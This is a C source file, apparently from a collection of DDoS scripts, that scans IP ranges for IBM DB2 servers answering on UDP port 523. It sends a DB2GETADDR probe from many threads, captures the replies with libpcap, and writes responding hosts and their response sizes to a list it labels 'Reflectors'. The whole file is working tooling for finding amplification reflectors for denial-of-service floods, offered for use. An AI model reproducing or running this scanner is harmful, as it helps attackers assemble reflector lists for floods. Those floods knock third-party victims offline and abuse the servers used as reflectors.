Path: blob/master/DDOS Scripts/AMP Methods/IBM B2 Amplification/db2_scanner.c
4622 views
/* DB2 Scanner, made by Bears. */12#include <pcap.h>3#include <stdio.h>4#include <stdlib.h> // for exit()5#include <string.h> //for memset6#include <sys/ioctl.h>7#include <net/if.h>8#include <sys/socket.h>9#include <arpa/inet.h> // for inet_ntoa()10#include <net/ethernet.h>11#include <netinet/udp.h> //Provides declarations for udp header12#include <netinet/ip.h> //Provides declarations for ip header13#include <pthread.h>14#include <semaphore.h>15#include <signal.h>16#include <sys/resource.h>17#include <unistd.h>18static unsigned int payloadsize = 20;19static unsigned int xport = 523;20void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);2122struct buffer23{24void *data;25int size;26struct buffer *next;27struct buffer *prev;28};29struct buffer *head;3031char *ipv4;32int processed,over,total,i,j;33struct sockaddr_in dest;34pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;35sem_t loop_sem;36int running_threads = 0;37volatile int found_srvs = 0;38volatile unsigned long per_thread = 0;39volatile unsigned long start = 0;40volatile unsigned long scanned = 0;41int sleep_between = 0;42volatile int bytes_sent = 0;43volatile unsigned long hosts_done = 0;44FILE *fd;4546void *readthread()47{48struct buffer *ourhead = head;49struct sockaddr_in saddr;50while(1)51{52sem_wait(&loop_sem);53while(ourhead->data == NULL){ ourhead = ourhead->next; }54pthread_mutex_lock(&buf_mutex);55void *buf = malloc(ourhead->size);56int size = ourhead->size;57memcpy(buf, ourhead->data, ourhead->size);58free(ourhead->data);59ourhead->data = NULL;60ourhead->size = 0;61pthread_mutex_unlock(&buf_mutex);62memset(&saddr, 0, sizeof(saddr));63struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));64saddr.sin_addr.s_addr = iph->saddr;65struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));66if(ntohs(udph->source) == xport)67{68int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);69fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);70fflush(fd);71found_srvs++;72}73free(buf);74processed++;75ourhead = ourhead->next;76}77}7879void *flood(void *par1)80{81running_threads++;82int thread_id = (int)par1;83unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));84unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));85unsigned long w;86int y;87unsigned char buf[65536];88memcpy(buf, "\x44\x42\x32\x47\x45\x54\x41\x44\x44\x52\x00\x53\x51\x4c\x30\x35\x30\x30\x30\x00", payloadsize);89int sizeofpayload = payloadsize;90int sock;91if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {92perror("cant open socket");93exit(-1);94}95for(w=ntohl(start_ip);w<htonl(end);w++)96{97struct sockaddr_in servaddr;98bzero(&servaddr, sizeof(servaddr));99servaddr.sin_family = AF_INET;100servaddr.sin_addr.s_addr=htonl(w);101servaddr.sin_port=htons(xport);102sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));103bytes_sent+=sizeofpayload;104scanned++;105hosts_done++;106usleep(sleep_between*1000);107}108close(sock);109running_threads--;110return;111}112113void sighandler(int sig)114{115fclose(fd);116printf("\n");117exit(0);118}119120void *printthread(void *argvs)121{122char **argv = (char **)argvs;123int threads = atoi(argv[4]);124pthread_t thread;125sleep(1);126char *str_start = malloc(18);127memset(str_start, 0, 18);128str_start = argv[1];129char *str_end = malloc(18);130memset(str_end, 0, 18);131str_end = argv[2];132start = inet_addr(str_start);133per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;134unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));135int i;136for(i = 0;i<threads;i++){137pthread_create( &thread, NULL, &flood, (void *) i);138}139char *temp = (char *)malloc(17);140memset(temp, 0, 17);141sprintf(temp, "Reflectors");142printf("%-16s", temp);143memset(temp, 0, 17);144sprintf(temp, "IP/s");145printf("%-16s", temp);146memset(temp, 0, 17);147sprintf(temp, "Bytes/s");148printf("%-16s", temp);149memset(temp, 0, 17);150sprintf(temp, "Threads");151printf("%-16s", temp);152memset(temp, 0, 17);153sprintf(temp, "%");154printf("%s", temp);155printf("\n");156157char *new;158new = (char *)malloc(16*6);159while (running_threads > 0)160{161printf("\r");162memset(new, '\0', 16*6);163sprintf(new, "%s|%-15lu", new, found_srvs);164sprintf(new, "%s|%-15d", new, scanned);165sprintf(new, "%s|%-15d", new, bytes_sent);166sprintf(new, "%s|%-15d", new, running_threads);167memset(temp, 0, 17);168int percent_done=((double)(hosts_done)/(double)(toscan))*100;169sprintf(temp, "%d%%", percent_done);170sprintf(new, "%s|%s", new, temp);171printf("%s", new);172fflush(stdout);173bytes_sent=0;174scanned = 0;175sleep(1);176}177printf("\n");178fclose(fd);179exit(0);180}181182int main(int argc, char *argv[ ])183184{185if(argc < 6){186fprintf(stderr, "Invalid parameters!\n");187fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);188exit(-1);189}190fd = fopen(argv[3], "a");191sleep_between = atoi(argv[5]);192int num_threads = atoi(argv[4]);193194const rlim_t kOpenFD = 1024 + (num_threads * 2);195struct rlimit rl;196int result;197rl.rlim_cur = kOpenFD;198rl.rlim_max = kOpenFD;199result = setrlimit(RLIMIT_NOFILE, &rl);200if (result != 0)201{202perror("setrlimit_nofile");203fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);204}205bzero(&rl, sizeof(struct rlimit));206rl.rlim_cur = 256 * 1024;207rl.rlim_max = 4096 * 1024;208result = setrlimit(RLIMIT_STACK, &rl);209if (result != 0)210{211perror("setrlimit_stack");212fprintf(stderr, "setrlimit_stack returned result = %d\n", result);213}214215signal(SIGINT, &sighandler);216217pcap_if_t *alldevsp;218pcap_t *handle; //Handle of the device that shall be sniffed219220char errbuf[100] , *devname , devs[100][100];221int count = 1 , n;222223if( pcap_findalldevs( &alldevsp , errbuf) )224{225exit(1);226}227228devname = alldevsp->name;229ipv4 = malloc(16);230bzero(ipv4, 16);231struct ifreq ifc;232int res;233int sockfd = socket(AF_INET, SOCK_DGRAM, 0);234235if(sockfd < 0) exit(-1);236strcpy(ifc.ifr_name, devname);237res = ioctl(sockfd, SIOCGIFADDR, &ifc);238close(sockfd);239if(res < 0) exit(-1);240strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));241printf("Opening device %s for sniffing ... " , devname);242handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);243244if (handle == NULL)245{246fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);247exit(1);248}249printf("Done\n");250251sem_init(&loop_sem, 0, -1);252i = 1024*1000;253while(i--)254{255if(head == NULL)256{257head = (struct buffer *)malloc(sizeof(struct buffer));258bzero(head, sizeof(struct buffer));259head->data = NULL;260head->size = 0;261head->next = head;262head->prev = head;263} else {264struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));265bzero(new_node, sizeof(struct buffer));266new_node->data = NULL;267new_node->size = 0;268new_node->prev = head;269new_node->next = head->next;270head->next = new_node;271}272}273274pthread_t prnthread;275pthread_create( &prnthread, NULL, &printthread, (void *)argv);276pthread_t redthread;277pthread_create( &redthread, NULL, &readthread, NULL);278279pcap_loop(handle , -1 , process_packet , NULL);280281return 0;282}283284void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)285{286int size = header->len;287288//Get the IP Header part of this packet , excluding the ethernet header289struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));290memset(&dest, 0, sizeof(dest));291dest.sin_addr.s_addr = iph->daddr;292293if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)294{295//toss into buffer296if(head->data != NULL) over++;297pthread_mutex_lock(&buf_mutex);298void *temp = malloc(size);299memcpy(temp, buffer, size);300head->data = temp;301head->size = size;302head = head->next;303pthread_mutex_unlock(&buf_mutex);304sem_post(&loop_sem);305total++;306}307}308309